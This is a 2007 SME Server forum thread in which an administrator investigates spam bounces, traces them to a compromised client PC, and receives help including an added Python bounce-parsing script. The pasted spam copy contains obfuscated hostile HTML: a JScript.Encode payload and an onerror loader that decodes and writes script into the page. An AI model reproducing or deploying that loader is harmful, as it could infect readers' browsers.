Koozali.org: home of the SME Server

MAILER-DAEMON@mydomain.com error, I don't understand

mapangojoe

MAILER-DAEMON@mydomain.com error, I don't understand
« on: February 16, 2007, 03:10:09 AM »
Hello All.  A few days ago I started getting these errors sent to Admin.  I only noticed them today.  They are arriving at a rate of 2 per minute.  Can someone please explain what may be occurring?

___________________________________________
Hi. This is the qmail-send program at mydomain.net.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<tommyhg@hanmail.net>:
Connected to 211.43.197.182 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhi@hanmail.net>:
Connected to 211.43.197.142 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyica@hanmail.net>:
Connected to 211.43.197.182 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhoho@hanmail.net>:
Connected to 211.43.197.47 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhiphip@hanmail.net>:
Connected to 211.43.197.47 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhilesco@hanmail.net>:
Connected to 211.43.197.96 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhong225@hanmail.net>:
Connected to 211.43.197.47 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhilfiger1@hanmail.net>:
Connected to 211.43.197.119 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyho15@hanmail.net>:
Connected to 211.43.197.171 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyishere@hanmail.net>:
Connected to 211.43.197.171 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyisyoung@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhoon@hanmail.net>:
Connected to 222.231.35.16 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyjee@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyjeans2@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyjeong@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyj68@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhh@hanmail.net>:
Connected to 222.231.35.15 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyjin@hanmail.net>:
Connected to 211.43.197.142 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhil@hanmail.net>:
Connected to 222.231.35.15 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyji@hanmail.net>:
Connected to 222.231.35.15 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

--- Below this line is a copy of the message.

Return-Path: <webmaster@myotherdomain.com>
Received: (qmail 32026 invoked from network); 9 Feb 2007 01:17:54 -0000
Received: from unknown (HELO biioiew.com) (218.53.105.175)
  by server.mydomain.net (66.225.16.170) with SMTP; 09 Feb 2007 01:17:54 -0000
Received: from 203.92.51.115 (203.92.51.115) by biioiew.com; Fri, 09 Feb 2007 10:27:22 GMT
From: "¹è¼÷Èñ" <webmaster@myotherdomina.com>
To: "tommyh" <tommyhg@hanmail.net>
Subject: ¢º¼­===¹Î===±Ý==À¶:(³â7.5~12%)!990320
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary= "----=_NEXTPart_YIE_VQZ_GWK5_LU782XR5_1RK6J21"
X-Priority: 5
X-MSMail-Priority: Low
X-Mailer: Microsoft Outlook Express 5.00.2615.200

------=_NEXTPart_YIE_VQZ_GWK5_LU782XR5_1RK6J21
Content-type: text/html
Content-Transfer-Encoding: base64

DQo=

------=_NEXTPart_YIE_VQZ_GWK5_LU782XR5_1RK6J21
Content-Type: text/html; name=" 1 "
Content-Disposition: inline; filename=" ¿©±â Ŭ¸¯! ´çÀÏ ÃÖÀú±Ý¸® ¹ÞÀ¸¼¼¿ä~~ "

<html><embed style=position:absolute style=background-color:#ffffff style=width:1000px style=height=2000px style=left:0px style=top:0px OnMOuseover= 'jscRIPT.EnCode: #@~^SAAAAA==sKmCDkKxRM+asl1+cB4YO2=zzu{cuv0u{{]+cc]NYO]&u{ uvWY+&]quG+Ru{y]6B*iixIAAA==^#~@'><IMG src="                             "ONERROr= 'vorct3="&4DTDSJQU&31mbohvbhf&4EKTdsjqu/Fodpef&4F&34A&8F&6FTBBBBB&4E&4EtLnDElLySN,btm2,dC5ZP3&4E{{v&8Cdvw1v&8C&8C&6E,dd&6E&8GOZ&8GP&6E&8G&37v&8C&31vwXZ,&37&6E&8GrvH,Sv&8Cz&6E&8G7C+jjyJBBB&4E&4E&6F&34&8FA&4D0TDSJQU&4F";    daum    =     "";for(k=0;k<vorct3.length;k++){daum+=String. fromCharCode (vorct3.charCodeAt(k) - 1);;}document.write  (unescape(daum));'"
------=_NEXTPart_YIE_VQZ_GWK5_LU782XR5_1RK6J21--

CharlieBrady
Re: MAILER-DAEMON@mydomain.com error, I don't understand
« Reply #1 on: February 16, 2007, 05:03:17 AM »
Quote from: "mapangojoe"

Return-Path: <webmaster@myotherdomain.com>
Received: (qmail 32026 invoked from network); 9 Feb 2007 01:17:54 -0000
Received: from unknown (HELO biioiew.com) (218.53.105.175)
  by server.mydomain.net (66.225.16.170) with SMTP; 09 Feb 2007 01:17:54 -0000
...


It looks to me as though you may have somehow managed to configure your system as an open mail relay, and spammers have discovered it. It's difficult to say, as you appear to have obfuscated the message - does it really say "myotherdomain.com"?

Do you have a form on your website which allows sending of mail? If so, disable it immediately, until it is proven not to be forwarding spam.

Send a full unmodified copy of the message, including full headers, to security at contribs dot org and someone will take a closer look.
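One way to read a bounce like the one quoted above mechanically, as an added example that is not from this thread or the SME Server project: it parses the qmail-send failure blocks and the Received chain of the returned copy, then reports whose IP the remote site blocked and which host handed the message to the local MTA. The sample bounce is constructed from the headers quoted in the thread, cut down to two recipients; the local IP and the network ranges passed to assess() are assumptions.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample modeled on the bounce quoted in the thread, cut down to
# two recipients; header values are the ones from the post.
SAMPLE_BOUNCE = """Hi. This is the qmail-send program at mydomain.net.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<tommyhg@hanmail.net>:
Connected to 211.43.197.182 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhoon@hanmail.net>:
Connected to 222.231.35.16 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

--- Below this line is a copy of the message.

Return-Path: <webmaster@myotherdomain.com>
Received: (qmail 32026 invoked from network); 9 Feb 2007 01:17:54 -0000
Received: from unknown (HELO biioiew.com) (218.53.105.175)
  by server.mydomain.net (66.225.16.170) with SMTP; 09 Feb 2007 01:17:54 -0000
Received: from 203.92.51.115 (203.92.51.115) by biioiew.com; Fri, 09 Feb 2007 10:27:22 GMT
From: "sender" <webmaster@myotherdomain.com>
To: "tommyh" <tommyhg@hanmail.net>
Subject: constructed sample

body
"""

COPY_MARKER = "--- Below this line is a copy of the message."

# One block per undeliverable recipient, as qmail-send writes them.
FAILURE_RE = re.compile(
    r"^<(?P<rcpt>[^>\n]+)>:\n"
    r"Connected to (?P<ip>[\d.]+) but greeting failed\.\n"
    r"Remote host said: (?P<reply>.*)$",
    re.MULTILINE,
)
# qmail-smtpd style: from <name> (HELO <helo>) (<ip>) by <host> (<ip>) with <proto>
RECEIVED_RE = re.compile(
    r"from\s+\S+(?:\s+\(HELO\s+(?P<helo>[^)]+)\))?\s+\((?P<from_ip>[\d.]+)\)"
    r"\s+by\s+(?P<by_host>\S+)\s+\((?P<by_ip>[\d.]+)\)\s+with\s+(?P<proto>[A-Z]+)"
)
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass
class Failure:
    recipient: str
    remote_ip: str   # MX the local MTA connected to
    reply: str       # the remote host's SMTP reply


@dataclass
class Hop:
    raw: str
    helo: Optional[str] = None
    from_ip: Optional[str] = None
    by_host: Optional[str] = None
    by_ip: Optional[str] = None
    proto: Optional[str] = None


def parse_failures(bounce: str) -> List[Failure]:
    """One Failure per '<rcpt>:' block in the qmail-send bounce."""
    return [Failure(m["rcpt"], m["ip"], m["reply"]) for m in FAILURE_RE.finditer(bounce)]


def original_headers(bounce: str) -> List[str]:
    """Header lines of the returned copy, with continuation lines unfolded."""
    _, _, copy = bounce.partition(COPY_MARKER)
    head, _, _ = copy.lstrip("\n").partition("\n\n")
    lines: List[str] = []
    for line in head.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def received_hops(bounce: str) -> List[Hop]:
    """Received: headers, newest first, as stamped by the MTAs along the path."""
    hops = []
    for line in original_headers(bounce):
        if not line.lower().startswith("received:"):
            continue
        body = line.split(":", 1)[1].strip()
        m = RECEIVED_RE.search(body)
        hops.append(Hop(body, **m.groupdict()) if m else Hop(body))
    return hops


def assess(bounce: str, local_ip: str, local_nets: List[str]) -> dict:
    """Explain the bounce: who blocked us, and which host handed us the mail."""
    failures = parse_failures(bounce)
    blocked = {ip for f in failures for ip in IPV4_RE.findall(f.reply)}
    nets = [ipaddress.ip_network(n) for n in local_nets]
    # The hop stamped "by <our host> (<our ip>)" is where our MTA accepted the message.
    accept = next((h for h in received_hops(bounce) if h.by_ip == local_ip), None)
    injector_external = bool(accept and accept.from_ip and
                             not any(ipaddress.ip_address(accept.from_ip) in n for n in nets))
    return {
        "failed_recipients": len(failures),
        "our_ip_is_blocked": local_ip in blocked,
        "injector_ip": accept.from_ip if accept else None,
        "injector_helo": accept.helo if accept else None,
        # A bare "with SMTP" hop records no authentication marker, so the header
        # alone cannot separate an open relay from a client using stolen
        # credentials; the MTA's own logs settle that.
        "unauthenticated_external_submission": injector_external and accept.proto == "SMTP",
    }


if __name__ == "__main__":
    # local_ip and the network list are assumptions for the sample.
    print(assess(SAMPLE_BOUNCE, "66.225.16.170", ["66.225.16.0/24", "192.168.0.0/16"]))
```

Run against the sample, the report shows our own address as the blocked one and an outside host (218.53.105.175, announcing itself as biioiew.com) as the party that handed the message to server.mydomain.net over plain SMTP, which is exactly the pattern that makes the open-relay or compromised-client question worth asking before anything else.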

mapangojoe

MAILER-DAEMON@mydomain.com error, I don't understand, SOLVED
« Reply #2 on: February 16, 2007, 09:37:22 PM »
Thanks for getting back to me on this. I continued to try to figure out what was occurring. I'm not an expert at this, but I have installed at least a dozen SME servers, and have never had one cracked. All the return messages seemed to come back from one of my domains, see the "myotherdomain.com" below (I obfuscated the name to protect the guilty!!). Finally, I deduced that the email was probably being sent from a violated Windows PC (can you IMAGINE that!!!) and that PC was sending out SPAM. I changed the username of the person using that account, and the SPAM returns have stopped cold. I then called the user and explained that her PC may have been hacked and that I had shut down her account for a while. She then went on to explain to me how her PC was acting very slow and strange lately, and that Outlook would not work any more. She could not tell me anything about the status of her antivirus software or her MS critical updates.

I just thought I'd update the list.  I'll continue to monitor, but I consider this case closed!


Chris Curtis


